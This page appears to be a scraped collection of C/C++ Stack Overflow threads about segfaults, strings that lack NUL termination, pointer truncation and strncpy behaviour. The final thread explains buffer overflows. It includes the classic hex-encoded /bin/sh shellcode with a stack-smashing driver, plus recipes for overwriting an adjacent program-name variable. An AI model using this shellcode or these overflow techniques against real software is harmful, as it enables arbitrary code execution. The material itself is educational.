Linux Segmentation fault with std::string::iterator - c++

I keep getting unusual segmentation faults inside libc.so.6 on a CentOS 6.4 64bit machine. This is the backtrace that gdb most often reports:
0x00007ffff60d9b3f in memcpy () from /lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff60d9b3f in memcpy () from /lib64/libc.so.6
#1 0x00000000004b6a6b in std::string::_S_construct<__gnu_cxx::__normal_iterator<char*, std::string> > ()
#2 0x00000000004b719b in NewsMAIL::SMTPClient::receiveLine(std::basic_string<char, std::char_traits<char>, std::allocator<char> >*) ()
#3 0x00000000004b776f in NewsMAIL::SMTPClient::handleResponse() ()
And this is the code in question that seems to trigger the segfault:
bool SMTPClient::receiveLine(std::string* Line)
{
static std::string Buffer;
std::string::iterator iter;
while((iter = std::find(Buffer.begin(), Buffer.end(), '\n')) == Buffer.end()) {
char Bucket[MAX_BUCKET_SIZE + 1] = {};
int BytesRecv = read(m_Socket, Bucket, MAX_BUCKET_SIZE);
//Did we get a socket error?
if(BytesRecv == -1) {
//This is generally considered a bad thing..
*Line = Buffer;
Buffer = std::string("");
return false;
}
Bucket[BytesRecv] = 0;
Buffer += Bucket;
}
*Line = std::string(Buffer.begin(), iter);
Buffer = std::string(iter + 1, Buffer.end());
return true;
}
Sometimes it works 100% without any failures so it is not everytime unfortunately.
The above code is a slightly modified version of this: https://stackoverflow.com/a/1584620/3133245
Does anyone have any thoughts on why this might be happening? I am compiling with g++ 4.7.2
Thanks!
Nate

Using a static variable (Buffer) is not thread safe. Could cause a crash.
You should add a check that Line is not NULL.
BTW, the line Buffer = std::string(""); could be Buffer.clear();

In addition to the static variable issue, are you sure that the data that is received contains no embedded NULL characters?
If the resulting Buffer contains embedded NULL bytes, this line will not do the correct concatenation using the += operator:
Buffer += Bucket;
The += overload assumes that Bucket is a c-style string, thus the first NULL byte encountered will be used as the terminator when the concatenation occurs.
Taking a glance at the code, it would seem to be the case that if the Bucket does indeed contain embedded NULL chracters, doing the above concatenation could result in your "iter" iterator pointing passed the end() of Buffer (in those lines after the while() loop).
Instead, you can do this:
Buffer.append(Bucket, BytesRecv)
This guarantees that all characters that Bucket is addressing will be concatenated onto the existing string.
But before making any changes, make sure you know exactly what the issue is, especially since you stated the error doesn't happen very often. Changing around code without first knowing the true cause of the error may just mask the error, thus making it harder to diagnose the real issue.

Related

Zero termination when casting a char array to string?

I have this simple piece of code which reverses a string:
# include <string>
string str = "abcd";
char *ch = new char[str.length()];
for (int i = 0, j = str.length() - 1; i < str.length(); i++, j--)
ch[j] = str[i];
str = string(ch);
cout << str;
This works fine, however I was wondering if the char array *ch must be zero terminated (perhaps it just works ok. because by chance there happens to be a 0 at memory position ch + str.length(). Therefore I've written the following quick test:
string str = "abcd";
char *ch = new char[str.length()];
for (int i = 0, j = str.length() - 1; i < str.length(); i++, j--)
ch[j] = str[i];
// note: illegal memory access, just a quick test
ch[str.length()] = 'a';
str = string(ch);
cout << str;
In the above code it is ensured that *ch is never zero terminated. To my suprise the code still works ok, I can't get my head around this. How can str = string(ch) result in "dbca" when at ch[str.length] there is 'a'; I would either expect a memory error or "dbcaa" as a result.
It doesn't matter what you did before this line:
str = string(ch);
The reason is that the line above may allocate memory, and the memory manager may have used the memory directly following your ch buffer as allocated space. So the a character you wrote there previously has vanished. Or something else happened during the construction of str that assumed that the space you wrote to previously is available.
If you want to know for sure, use your debugger. The std::string constructor and implementation will tell you what exactly occurred (that is, if your program even gets this far since you did introduce undefined behavior before the line of code above).
It's called undefined behaviour. It could be there is a zero after the last address of ch so it could appear to work. But you're overwriting memory allocated from the memory manager which will corrupt it, so you will run into trouble in a bigger application.
The memory manager could reserve a few more bytes in debug builds for debug purpose. Try a release build and see what happens
You're code is totally broken, having undefined behaviour. Specifically...
ch[j] = ch[i];
...reads from ch[i] which is uninitialised memory - as bgoldst commented it's probably meant to be str[i], then - even if that didn't invalidate any expectations of program behaviour...
str = string(ch);
...attempts construction using a ch, which points to still uninitialised memory that could have any content at all, and will be scanned along until a NUL happens to be hit, some access violation crashes the program, or whatever other undefined behaviour manifests. If you fixed the loop to copy from str, then you'd probably want this to cope with the lack of NUL termination:
str = string(ch, str.length());
Perhaps the vaguely worthwhile question is "isn't it almost impossible that I'd have observed (the claimed) dbca output despite the above errors?". To that I'd say:
dbca is not dcba - which did you actually see?
garbage characters in memory might not do anything on your terminal, and it's quite possible that attempting to print from where ch was allocated printed nothing visible, or e.g. printed some crap then a clear-back-to-the-start-of-line, delete-previous, backspace etc. character code, then happened to hit the memory allocated by the std::string object (seemingly lacking a short-string-optimisation buffer), and therefore displayed its contents too.
So - it's not so statistically amazing to constitute evidence for your program somehow having defined behaviour....

C/C++ Valid pointer but getting EXC_BAD_ACCESS and KERN_INVALID_ADDRESS

I've been racking my brain over this for hours and I can't find anything.
Potentially relevant information:
Running on OSX 10.10.1 Yosemite
This same code works perfectly fine on Windows.
Every time I run this, it breaks at the exact same spot.
The application is an OpenGL app that uses glfw3 to create a window.
There are no threads, it's just a single threaded app, so the pointer is not being overwritten or being deallocated.
These two methods are contained in two separate .c files that are compiled as c++ and contained within a built library that I link to. Other methods in the library work just fine.
OPchar* OPstreamReadLine(OPstream* stream) {
OPchar buffer[500];
i32 len, i;
// ALL WORKS FINE
// check to see if we are at the end of the stream or not
if(stream->_pointer >= stream->Length) return 0;
// Prints out the contents of the stream, and the start of the pointer just fine
OPlog("Buffer %s | Pointer %d", stream->Data, stream->_pointer);
sscanf((OPchar*)stream->Data stream->_pointer, "%500[^\n]", buffer);
len = strlen(buffer);
stream->_pointer = len 1;
// Spits out 'Read Hello of len 5'
OPlog("Read %s of len %d", buffer, len);
// ISSUE STARTS HERE
// OPchar is a typedef of char
// STEP 1. Make the call
OPchar* result = OPstringCreateCopy(buffer);
// STEP 6. The Pointer is printed out correctly, its the same thing
// ex: Pos: 0xd374b4
OPlog("Pos: 0x%x", result);
// STEP 7. This is where it breaks
// EXC_BAD_ACCESS and KERN_INVALID_ADDRESS
// What happened?
// Did returning the pointer from the function break it?
OPlog("len: %d", strlen(result));
OPlog("Result %s", result);
return result;
}
OPchar* OPstringCreateCopy(const OPchar* str) {
i32 len = strlen(str);
// STEP 2. Prints out 'Hello 5'
OPlog("%s %d", str, len);
// Allocates it (just uses malloc)
OPchar* result = (OPchar*)OPalloc(sizeof(OPchar) * (len + 1));
// Copies the previous string into the newly created one
strcpy(result, str);
// Ensures that it's null terminated
// even though strcpy is supposed to do it
result[len] = NULL;
// STEP 3. Gives a good pointer value
// ex: Pos: 0xd374b4
OPlog("Pos: 0x%x", result);
// STEP 4. Prints out '5'
OPlog("len: %d", strlen(result));
// STEP 5. Prints out 'Hello'
OPlog("hmmm: %s", result);
// Just return this same pointer
return result;
}
I've since replaced these functions with versions that don't use the sscanf stuff which got around the issue, however I'm now hitting the same problem with another returned pointer becoming invalid. This example was simpler to explain, so I thought I'd start there.
Here's a theory, which you may go test. Instead of using %x to print your pointers, use %p instead. You may be on a 64-bit OS and not realizing it. The problem could be that you did not supply a prototype for OPstringCreateCopy, in which case the return value was treated as an int (32 bits) instead of a pointer (64 bits). Since you are only printing out 32 bits of result, it seems like the pointer is valid, but the upper 32 bits may have been lost.
The fix for this is to make sure you always supply prototypes for all your functions. There should be some compiler warnings that you can turn on to assist you with finding uses of unprototyped functions. You might also want to go through your code and check for any other 64-bit problems, such as if you ever cast a pointer to an int.

Strange behavior with function strncpy?

In my project,I have met these strange problem with strncpy. I have checked the reference. But the function strncpy behavior make me confused.
In this function, when it runs to strncpy(subs,target,term_len);
While I don't know why there is two blanks after the string?!!! It is a big project, I cannot paste all the code here. Following is just a piece. All my code is here.
char* subs = new char[len];
while(top<=bottom){
char* term = m_strTermTable[bottom].strterm;
int term_len = strlen(term);
memset(subs,'\0',len);
strncpy(subs,target,term_len);
int subs_len = strlen(subs);
int re = strcmp(subs,term);
if (re == 0)
{
return term_len;
}
bottom--;
}
delete[] subs;
strncpy does not add a terminating null byte if the source string is longer than the maximum number of characters (i.e. in your case, that would be if strlen(target) > term_len holds). If that happens, subs may or may not be null terminated correctly.
Try changing your strncpy call to
strncpy(subs, target, term_len-1);
so that even if strncpy doesn't add a terminating null byte, subs will still be null-terminated correctly due to the previous memset call.
Now, that being said - you could avoid using a separate subs buffer altogether (which leaks anyway in case the control flow gets to the return statement) by just using strncmp as in
while(top<=bottom) {
char* term = m_strTermTable[bottom].strterm;
int term_len = strlen(term);
if (strncmp(term, target, term_len) == 0) {
return term_len;
}
bottom--;
}

C++ std:string memory model

The following code (part of a request-response loop in a networked server) works most of the time, but sometimes fails, in that the client will report it has gotten some weird other string (seemingly random bytes from locations nearby in memory in this functions, or null bytes).
string res = "";
if (something) {
res = "ok";
}
if (res.length() > 0) {
send_data((void*) res.c_str(), res.length());
}
In my mind, it would seem that both "" and "ok" are constant std:strings, and res is a pointer to either one of them, and as such the whole thing should work, but apparently that's not the case, so can someone please explain to me what happens here?
You probably forgot to send the null-terminator to denote the end of the string:
send_data((void*) res.c_str(), res.length()+1);
Your code is okay, I suppose there's some memory corruption in your program.
"" and "ok" are actually zero-terminated buffers of type 'const char *', not strings. When you assign them to your string all their data is copied inside string internal buffer, not including last char which is zero, so
res = "";
will clear internal string buffer, and res.length() will become 0.
res.c_str() will return the address of that buffer, not the address of "" or "ok" literals.

Can you give an example of a buffer overflow?

I've heard so much about buffer overflows and believe I understand the problem but I still don't see an example of say
char buffer[16];
//code that will over write that buffer and launch notepad.exe
"Smashing The Stack For Fun And Profit" is the best HowTo/FAQ on the subject.
See: http://insecure.org/stf/smashstack.html
Here is a snip of some actual shellcode:
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
strcpy(buffer,large_string);
}
First, you need a program that will launch other programs. A program that executes OS exec in some form or other. This is highly OS and language-specific.
Second, your program that launches other programs must read from some external source into a buffer.
Third, you must then examine the running program -- as layed out in memory by the compiler -- to see how the input buffer and the other variables used for step 1 (launching other programs) exist.
Fourth, you must concoct an input that will actually overrun the buffer and set the other variables.
So. Part 1 and 2 is a program that looks something like this in C.
#include <someOSstuff>
char buffer[16];
char *program_to_run= "something.exe";
void main( char *args[] ) {
gets( buffer );
exec( program_to_run );
}
Part 3 requires some analysis of what the buffer and the program_to_run look like, but you'll find that it's probably just
\x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 \x00 s o m e t h i n g . e x e \x00
Part 4, your input, then has to be
1234567890123456notepad.exe\x00
So it will fill buffer and write over program_to_run.
There are two separate things:
The code that overflows a buffer, this is easy to do and will most likely end with a segmentation fault. Which is what has been shown: sprintf(buffer,"01234567890123456789");
The means of putting on the overwritten memory code that it is executed by the operating system. This is harder than merely overflowing a buffer, and is related to how programs are executed. They usually grab the next instruction to execute from a stack, if you manage to put in the next value of the stack a valid instruction via overwriting the memory without creating execution pointer corruption (or any other kind of corruption), you can create an exploit. It is usually done by putting a jump instruction in the next to be read value of the stack to a section of memory which contains code. This is why marking sections of memory as non executable can help against these kind of exploits.
well, i dont know how to launch notpad.exe, but to overwrite this buffer simply do:
sprintf(buffer, "somestringlongerthan16");
int x[10];
x[11] = 1;
gets(buffer);
There is no way to use gets properly, as it doesn't ask for the size of the buffer.
scanf("%s", buffer);
Scanf will read string input until it hits whitespace, it the user types more than 16 characters there will be a buffer overflow.
The way a buffer overflow can be used to make code do something other than intended, is by writing data outside the allocated buffer overwriting something else.
The overwritten data would typically be the code in another function, but a simple example is overwriting a variable next to the buffer:
char buffer[16];
string myapp = "appmine.exe";
void execMe(string s) {
for (int i = 0; i < s.Length; i++) buffer[i] = s[i];
Sys.Execute(myapp, buffer);
}
If you call the function with more data than the buffer can hold, it would overwrite the file name:
execMe("0123456789012345notepad");
Phrack's Smashing The Stack For Fun And Profit has enough explanation to enable you to do what you're asking.
For a simple example see also here:
Protecting Against Some Buffer-Overrun Attacks: An Example Attack
http://www.greenend.org.uk/rjk/random-stack.html